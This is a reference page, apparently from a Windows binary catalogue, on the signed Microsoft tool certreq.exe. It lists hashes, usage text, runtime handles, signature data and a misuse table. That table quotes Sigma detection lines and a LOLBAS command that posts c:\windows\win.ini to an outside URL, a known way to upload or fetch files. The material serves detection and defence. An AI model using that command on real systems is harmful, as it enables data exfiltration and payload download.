certreq.exe

  • File Path: C:\WINDOWS\SysWOW64\certreq.exe
  • Description: CertReq.exe

Screenshot

certreq.exe

Hashes

Type Hash
MD5 A528FC0026A26655C76B7409B1E98CAD
SHA1 26AB1027E045432D38CE5BB990EAFAE3A60BD3C9
SHA256 7240A63BD9D17C5C21142A510690216CC2F8C4718F31E499221E2E3A5B71EEDA
SHA384 ACA0AB1D3CF51D2B77E7031417FE20B094677BFDC69FE392060C248EB63BC67CF0EEC0F08439F829E25347105D78F7B0
SHA512 1499B452AEDB3221D90B5CB0454748D91EF20096B9EDE3003E8B8E0E24AE1D78F7189D431EADDCC51107AE5CF3C85F757230DC583E27E1646EABCF8AABA120B3
SSDEEP 6144:VTMw+oUIK4HQuHE+2aXO36+8VOTZXQL57X2TSpgM9wfudKd:V4NJuH92ae36+8wTZXQL57mevyxd
IMP 94C45B4E79AB8AEBE640AAC4C5D58304
PESHA1 0CA0EF78CF8CBB80F90C02942AD24551AD87BD2F
PE256 F73999C68C400CAF3F773476426ACBCF9D9F4C915F5DE5AEA842C2B14CFCF4F5

Runtime Data

Usage (stdout):

Usage:
  CertReq -?
  CertReq [-v] -?
  CertReq [-Command] -?

  CertReq [-Submit] [Options] [RequestFileIn [CertFileOut [CertChainFileOut [FullResponseFileOut]]]]
    Submit a request to a Certification Authority.

  Options:
    -attrib AttributeString
    -binary
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -crl
    -rpc
    -AdminForceMachine
    -RenewOnBehalfOf
    -NoChallenge

  CertReq -Retrieve [Options] RequestId [CertFileOut [CertChainFileOut [FullResponseFileOut]]]
    Retrieve a response to a previous request from a Certification Authority.

  Options:
    -binary
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -crl
    -rpc
    -AdminForceMachine

  CertReq -New [Options] [PolicyFileIn [RequestFileOut]]
    Create a new request as directed by PolicyFileIn

  Options:
    -attrib AttributeString
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -config ConfigString
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -user
    -machine
    -xchg ExchangeCertFile

  CertReq -Accept [Options] [CertChainFileIn | FullResponseFileIn | CertFileIn]
    Accept and install a response to a previous new request.

  Options:
    -user 
    -machine 
    -pin Pin

  CertReq -Policy [Options] [RequestFileIn [PolicyFileIn [RequestFileOut [PKCS10FileOut]]]]
    Construct a cross certification or qualified subordination request
    from an existing CA certificate or from an existing request.

  Options:
    -attrib AttributeString
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -noEKU
    -AlternateSignatureAlgorithm
    -HashAlgorithm HashAlgorithm

  CertReq -Sign [Options] [RequestFileIn [RequestFileOut]]
    Sign a certificate request with an enrollment agent or qualified
    subordination signing certificate.

  Options:
    -binary
    -cert CertId
    -PolicyServer PolicyServer
    -Anonymous
    -Kerberos
    -ClientCertificate ClientCertId
    -UserName UserName
    -p Password
    -pin Pin
    -crl
    -noEKU
    -HashAlgorithm HashAlgorithm

  CertReq -Enroll [Options] TemplateName
  CertReq -Enroll -cert CertId [Options] Renew [ReuseKeys]
    Enroll for or renew a certificate.

  Options:
    -PolicyServer PolicyServer
    -user 
    -machine 
    -pin Pin

  CertReq -EnrollAIK [Options] [KeyContainerName]
    Enroll for AIK certificate.

  Options:
    -config

  CertReq -EnrollCredGuardCert [Options] TemplateName [ExtensionInfFile]
    NOTE: Enrolling for machine account Credential Guard certificate is not supported on this platform.

  Options:
    Not supported on this platform

  CertReq -EnrollLogon [Options]
    Enroll for Hello for Business Logon certificate via ADFS.

  Options:
    -q

  CertReq -Post [Options]
    POST an http request.

  Options:
    -attrib AttributeString
    -config URL

Unknown argument: --help

Child Processes:

conhost.exe

Window Title:

Certificate Request Processor

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\certreq.exe.mui File
(R-D) C:\Windows\System32\en-US\KernelBase.dll.mui File
(RW-) C:\Windows File
(RW-) C:\Windows\SysWOW64 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme1077709572 Section
\Windows\Theme3461253685 Section

Loaded Modules:

Path
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\wow64.dll
C:\WINDOWS\System32\wow64base.dll
C:\WINDOWS\System32\wow64con.dll
C:\WINDOWS\System32\wow64cpu.dll
C:\WINDOWS\System32\wow64win.dll
C:\WINDOWS\SysWOW64\certreq.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: CertReq.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/73
  • VirusTotal Link: https://www.virustotal.com/gui/file/7240a63bd9d17c5c21142a510690216cc2f8c4718f31e499221e2e3a5b71eeda/detection

Possible Misuse

The following table contains possible examples of certreq.exe being misused. While certreq.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma proc_creation_win_susp_certreq_download.yml title: Suspicious Certreq Command to Download DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml description: Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml - https://lolbas-project.github.io/lolbas/Binaries/Certreq/ DRL 1.0
sigma proc_creation_win_susp_certreq_download.yml Image\|endswith: '\certreq.exe' DRL 1.0
LOLBAS Certreq.yml Name: CertReq.exe  
LOLBAS Certreq.yml - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt  
LOLBAS Certreq.yml - Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal  
LOLBAS Certreq.yml - Path: C:\Windows\System32\certreq.exe  
LOLBAS Certreq.yml - Path: C:\Windows\SysWOW64\certreq.exe  
LOLBAS Certreq.yml - IOC: certreq creates new files  
LOLBAS Certreq.yml - IOC: certreq makes POST requests  
LOLBAS Certreq.yml - Link: https://dtm.uk/certreq  

MIT License. Copyright (c) 2020-2021 Strontic.